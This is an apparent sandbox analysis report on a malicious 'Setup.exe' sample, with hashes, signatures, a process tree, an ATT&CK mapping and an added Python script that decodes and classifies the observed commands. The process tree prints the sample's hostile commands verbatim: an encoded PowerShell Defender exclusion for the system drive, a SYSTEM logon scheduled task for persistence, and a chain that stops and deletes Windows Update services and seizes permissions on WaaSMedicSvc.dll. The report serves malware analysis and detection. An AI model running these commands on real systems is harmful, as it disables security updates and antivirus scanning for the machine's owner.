Analysis

  • max time kernel
    72s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    05-05-2022 01:16

General

  • Target

    Setup.exe

  • Size

    4MB

  • MD5

    62ed80f638e9551e1e59b4ea9341bccd

  • SHA1

    44196e8cb0f5774decf60e12215767f092c3c008

  • SHA256

    c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf

  • SHA512

    56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Malware Config

Signatures

  • Modifies security service (2 TTPs, 5 IoCs)
  • Executes dropped EXE (3 IoCs)
  • Possible privilege escalation attempt (4 IoCs)
  • Stops running service(s) (3 TTPs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely for geofencing.

  • Modifies file permissions (1 TTP, 4 IoCs)
  • Checks whether UAC is enabled (1 TTP, 2 IoCs)
  • Looks up external IP address via web service (1 IoC)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext (1 IoC)
  • Drops file in Program Files directory (2 IoCs)
  • Launches sc.exe

    sc.exe is the Windows utility for controlling services on the system.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). The sandbox treats this as a possible ransomware indicator.

  • Creates scheduled task(s) (1 TTP, 1 IoC)

    schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS (46 IoCs)
  • Modifies registry key (1 TTP, 18 IoCs)
  • Suspicious behavior: EnumeratesProcesses (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2296
    • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Checks whether UAC is enabled
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4596
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:232
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4456
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
          4⤵
          • Creates scheduled task(s)
          PID:4720
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          4⤵
          PID:4064
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          4⤵
          PID:1632
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:3552
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          4⤵
          PID:3684
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          4⤵
          PID:1292
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          PID:2140
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          4⤵
          PID:872
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          4⤵
          PID:4300
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:3904
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:1548
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:1492
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
        3⤵
        PID:728
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 3
          4⤵
          PID:4944
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"
        3⤵
        PID:3492
  • C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    1⤵
    PID:4360
  • C:\Windows\system32\sc.exe
    sc stop wuauserv
    1⤵
    PID:4796
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
    1⤵
    • Modifies registry key
    PID:2300
  • C:\Windows\system32\sc.exe
    sc stop dosvc
    1⤵
    PID:4328
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
    1⤵
    • Modifies registry key
    PID:1500
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
    1⤵
    • Modifies registry key
    PID:2308
  • C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
    1⤵
    • Possible privilege escalation attempt
    • Modifies file permissions
    PID:1380
  • C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
    1⤵
    • Possible privilege escalation attempt
    • Modifies file permissions
    • Suspicious use of AdjustPrivilegeToken
    PID:3324
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
    1⤵
    • Modifies security service
    • Modifies registry key
    PID:1604
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
    1⤵
    • Modifies registry key
    PID:5032
  • C:\Windows\system32\sc.exe
    sc stop bits
    1⤵
    PID:2656
  • C:\Windows\system32\sc.exe
    sc stop UsoSvc
    1⤵
    PID:4880
  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
    "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
    1⤵
    • Executes dropped EXE
    • Checks whether UAC is enabled
    • Modifies data under HKEY_USERS
    PID:2884
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
      2⤵
      PID:2324
    • C:\Windows\System32\conhost.exe
      C:\Windows\System32\conhost.exe
      2⤵
      PID:320
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "vqtwwwbrwdqzx"
        3⤵
        PID:3012
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      PID:488
  • C:\Windows\system32\schtasks.exe
    schtasks /run /tn "iexplore"
    1⤵
    PID:2292
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4692
  • C:\Windows\system32\sc.exe
    sc stop bits
    1⤵
    PID:1904
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
    1⤵
    • Modifies registry key
    PID:5104
  • C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
    1⤵
    • Possible privilege escalation attempt
    • Modifies file permissions
    PID:2816
  • C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
    1⤵
    PID:3572
  • C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    1⤵
    PID:1152
  • C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
    1⤵
    PID:4252
  • C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
    1⤵
    PID:2508
  • C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
    1⤵
    PID:204
  • C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
    1⤵
    PID:4028
  • C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
    1⤵
    PID:2524
  • C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
    1⤵
    • Modifies registry key
    PID:4580
  • C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
    1⤵
    • Modifies registry key
    PID:1040
  • C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
    1⤵
    • Modifies registry key
    PID:212
  • C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
    1⤵
    • Modifies registry key
    PID:5036
  • C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
    1⤵
    • Possible privilege escalation attempt
    • Modifies file permissions
    PID:1076
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
    1⤵
    • Modifies registry key
    PID:2052
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
    1⤵
    • Modifies registry key
    PID:3180
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
    1⤵
    • Modifies registry key
    PID:1348
  • C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
    1⤵
    • Modifies registry key
    PID:3128
  • C:\Windows\system32\sc.exe
    sc stop dosvc
    1⤵
    PID:820
  • C:\Windows\system32\sc.exe
    sc stop wuauserv
    1⤵
    PID:2924
  • C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    1⤵
    PID:2792
  • C:\Windows\system32\sc.exe
    sc stop UsoSvc
    1⤵
    PID:4200
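The process tree above is the whole story of this sample's defence-impairment chain, but it is spread across dozens of child processes and one base64 blob. As an added example (not part of the sandbox report and not the sample's own code), the following Python script takes command lines copied from the tree, decodes the -EncodedCommand argument (PowerShell expects base64 of UTF-16LE text, and this one is padded with junk `<# ... #>` block comments), and tags each step of the chain: Defender exclusions, service stops, service-key deletions, Windows Update policy values, disabled update tasks, the ACL tampering on WaaSMedicSvc.dll, and the SYSTEM-level logon task used for persistence. The tag names, the regular expressions, and the mapping from tags to the ATT&CK v6 technique IDs shown in the report's matrix are this example's own choices; the command-line list is assembled by hand from the tree so the script runs offline.

```python
import base64
import re

# Base64 argument of the -EncodedCommand seen in the process tree (copied verbatim).
B64 = ("PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMA"
       "aABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoA"
       "VQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYA"
       "ZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA==")

def decode_encoded_command(b64):
    """powershell -EncodedCommand expects base64 of the script encoded as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")

def strip_block_comments(script):
    """Drop <# ... #> block comments (junk padding here) and collapse whitespace."""
    return " ".join(re.sub(r"<#.*?#>", " ", script, flags=re.S).split())

ENCODED = re.compile(r'powershell\s+-EncodedCommand\s+"?([A-Za-z0-9+/=]+)', re.I)
DEFENDER_EXCL = re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I)
# One rule per step type in the chain; the first matching rule tags the step.
RULES = [
    ("service-stop", re.compile(r"\bsc\s+stop\s+(\S+)", re.I)),
    ("service-key-delete", re.compile(
        r"reg\s+delete\s+HKLM\\SYSTEM\\CurrentControlSet\\Services\\(\S+)\s+/f", re.I)),
    ("update-policy", re.compile(
        r"reg\s+add\s+HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\s+/v\s+(\S+)\s+/d\s+(\S+)", re.I)),
    ("task-disable", re.compile(r'schtasks\s+/change\s+/tn\s+"([^"]+)"\s+/disable', re.I)),
    ("task-create", re.compile(
        r'schtasks\s+/create\b.*?/ru\s+"?([^"\s]+)"?\s.*?/tn\s+"([^"]+)"\s+/tr\s+"([^"]+)"', re.I)),
    ("file-acl-tamper", re.compile(r"\b(?:takeown\s+/f|icacls)\s+(\S+)", re.I)),
    ("file-rename", re.compile(r"\brename\s+(\S+)\s+(\S+)", re.I)),
]
# Tag -> ATT&CK v6 technique as named in the report's matrix (mapping chosen for this example).
ATTACK = {
    "service-stop": "T1489 Service Stop",
    "service-key-delete": "T1112 Modify Registry",
    "update-policy": "T1112 Modify Registry",
    "task-disable": "T1562 Impair Defenses",
    "defender-exclusion": "T1562 Impair Defenses",
    "file-rename": "T1562 Impair Defenses",
    "file-acl-tamper": "T1222 File Permissions Modification",
    "task-create": "T1053 Scheduled Task",
}

def classify(cmdline):
    """Return (tag, detail) findings for one command line; cmd /c chains are split on '&'."""
    findings = []
    for step in cmdline.split(" & "):
        if m := ENCODED.search(step):
            script = strip_block_comments(decode_encoded_command(m.group(1)))
            tag = "defender-exclusion" if DEFENDER_EXCL.search(script) else "encoded-powershell"
            findings.append((tag, script))
            continue
        for tag, rx in RULES:
            if m := rx.search(step):
                findings.append((tag, " ".join(m.groups())))
                break
    return findings

def triage(cmdlines):
    """Group findings by tag, de-duplicated but in first-seen order."""
    report = {}
    for line in cmdlines:
        for tag, detail in classify(line):
            bucket = report.setdefault(tag, [])
            if detail not in bucket:
                bucket.append(detail)
    return report

def techniques(report):
    """Sorted ATT&CK technique labels touched by the findings."""
    return sorted({ATTACK[tag] for tag in report if tag in ATTACK})

# Command lines copied from the process tree above, assembled by hand for an offline run.
SAMPLE_CMDLINES = [
    'cmd /c powershell -EncodedCommand "' + B64 + '"',
    r'cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"',
    r'cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc '
    r'& reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f '
    r'& reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f '
    r'& reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll '
    r'& icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll '
    r'& reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f '
    r'& reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f '
    r'& reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f '
    r'& reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f '
    r'& SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE '
    r'& SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE '
    r'& SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE '
    r'& SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE',
    r'cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"',
    'cmd /c schtasks /run /tn "iexplore"',
]

if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for tag, details in found.items():
        print(tag + ":", *details, sep="\n    ")
    print("ATT&CK:", ", ".join(techniques(found)))
```

Two points worth noting when reusing this on real telemetry: the decoded script is `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, which excludes the whole system drive from Defender scanning, so matching on the decoded text rather than the base64 is what survives the junk-comment padding; and the chain deletes the service registry keys outright after stopping them, so on an infected host `sc query WaaSMedicSvc` reporting a missing service, a renamed `WaaSMedicSvc_BAK.dll`, and an `iexplore` logon task running as SYSTEM are the artefacts to check for.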

Network

MITRE ATT&CK Matrix (ATT&CK v6)

Each tactic lists its techniques as name, technique ID, and the count of matching signatures in parentheses.

  • Execution
    Scheduled Task, T1053 (1)
  • Persistence
    Modify Existing Service, T1031 (2)
    Scheduled Task, T1053 (1)
  • Privilege Escalation
    Scheduled Task, T1053 (1)
  • Defense Evasion
    Modify Registry, T1112 (2)
    Impair Defenses, T1562 (1)
    File Permissions Modification, T1222 (1)
  • Discovery
    Query Registry, T1012 (1)
    System Information Discovery, T1082 (3)
  • Impact
    Service Stop, T1489 (1)


Downloads

  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
    Filesize
    109MB
    MD5
    1950297d47a665359dde4d26aca66cea
    SHA1
    4a90a0c35c0e9a438c030efd42fa3f5c5ece13d0
    SHA256
    87e439ba3df8f0e37f2ce2eb48266260e24df4a6882949e7194dce365f9a209a
    SHA512
    4be513976f34404ff36bfa176c0c5d1600e4323d0240d43fb994438e0f51f11a9c35a88223acbb3ebed0097343dfe98b065aa692566c5f5a9feff17c65f05354

  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
    Filesize
    111MB
    MD5
    cbfba19fa7c371cb8564da353be24b66
    SHA1
    5a4455a49f891068e8d6d3319e9432d9bbb28599
    SHA256
    70fdd145714a1a614c7190c083e8d4b9afccc4475ccb007cbdb143125baa0564
    SHA512
    88eff50a524f7df4f468594b1e0fe27f20c7613904f21cd2fb49ac65663955a62c181d9825e569b272c169c720cdb264fff1ae230d597148f19d62b192c97baa

  • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
    Filesize
    421MB
    MD5
    e55117c94fc3ccea985ae03f7bf95a6f
    SHA1
    d28a699514029af1b911d52da9818f8a20f8aafd
    SHA256
    e160b397a204b243998017edf0caa1bb40a33041d70d18f55e86c3925bda190f
    SHA512
    e6d27476a5f7d64161b147d73478b81abb6f5ab7e120756444d63736b6d903bddc497985c3cc62bc4cf726ea1ce9516ac916c3c67f29993b989da88febdd3deb

  • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
    Filesize
    427MB
    MD5
    7420369dd4d15a37a2cfa5560132d0ba
    SHA1
    1106e854ec5973404d271a8fe8b27cbddc8580a9
    SHA256
    d1726b83bbf8b06a2c6029f52b8bae68beaf2c125574ad527296cd0a8057c45a
    SHA512
    0aac7cb42609c0d29e31c08da9d3ca97b891a381f5e74aa248b1815b3ea5a430b6dff9278706ba9ff51cc9d237a3fa810d276444949647f76ae287d8302d7b7f

  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
    Filesize
    202MB
    MD5
    f7d88c51fa11a526d317881e01927693
    SHA1
    9e9ca5d868c0c7b2307c0eef95877e59d582e5da
    SHA256

                                                                    b6a46cec55a85c7348fba6c2f798e3406fd7a23903a62d51984877639b6ff947

                                                                    SHA512

                                                                    d32eb2b488139f5c2dc48fc8eecfb31f1dd6b8d2862a7f042962052b98582fde43271e44db856e81be79f3e947533ea678f655e41e41c25a83ce11b1d4a947f4

                                                                  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
                                                                    Filesize

                                                                    196MB

                                                                    MD5

                                                                    d0dba409b80a61191c37bc6e2d359556

                                                                    SHA1

                                                                    a3b1d755a82a42f429e5400c06f92e909056544f

                                                                    SHA256

                                                                    8496dbee0ca256465aca87c537b0d1e642666886f6d4324f913c7c1220aba089

                                                                    SHA512

                                                                    a48737f8d5312ccec95939e5f8cbe82c4af0b09c7cc4de7160ce20d990ef865f5e2d3c58d7933e05f0b770cf03714eb65be533a31c390c150582a5e55c6a7f3c
